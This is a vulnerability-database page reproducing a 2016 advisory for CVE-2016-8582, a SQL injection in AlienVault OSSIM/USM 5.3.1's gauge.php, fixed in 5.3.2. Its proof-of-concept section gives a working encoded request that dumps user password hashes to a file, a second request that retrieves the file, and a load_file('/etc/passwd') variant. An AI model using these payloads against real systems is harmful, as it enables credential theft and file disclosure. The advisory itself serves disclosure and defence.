Lucene search
K

Alienvault OSSIM/USM 5.3.1 - SQL Injection

🗓️ 02 Nov 2016 00:00:00Reported by Peter LappType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Alienvault OSSIM/USM 5.3.1 SQL Injection in gauge.php

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Alienvault OSSIM/USM 5.3.1 - SQL Injection Vulnerability
2 Nov 201600:00
zdt
Circl
CVE-2016-8582
2 Nov 201600:00
circl
CNVD
AlienVault OSSIM and USM SQL Injection Vulnerabilities
27 Oct 201600:00
cnvd
CVE
CVE-2016-8582
28 Oct 201615:00
cve
Cvelist
CVE-2016-8582
28 Oct 201615:00
cvelist
exploitpack
Alienvault OSSIMUSM 5.3.1 - SQL Injection
2 Nov 201600:00
exploitpack
Metasploit
AlienVault OSSIM/USM Remote Code Execution
31 Jan 201711:15
metasploit
NVD
CVE-2016-8582
28 Oct 201615:59
nvd
Packet Storm
Alienvault OSSIM/USM 5.3.1 SQL Injection
2 Nov 201600:00
packetstorm
Prion
Design/Logic Flaw
28 Oct 201615:59
prion
Rows per page
Details
=======

Product: Alienvault OSSIM/USM
Vulnerability: SQL Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8582
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2



Vulnerability Details
=====================

A SQL injection vulnerability exists in the value parameter of
/ossim/dashboard/sections/widgets/data/gauge.php on line 231. By
sending a serialized array with a SQL query in the type field, it's
possible to execute an arbitrary SQL query. The result is not
displayed on the screen, but it can be exploited as a blind SQLi or
have the output directed to a file and then retrieved via another
request. Authentication is required.



POC
===

This request will dump user password hashes to a file:

/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D

The file containing the output can then be retrieved with the following request:
/ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123

It's also possible to read the contents of any file readable by the
mysql user by using mysql's load_file function. For example, changing
the request to something like select load_file('/etc/passwd') .



Timeline
========

08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2



References
==========

https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Nov 2016 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
CVSS 39.8
EPSS0.80548
31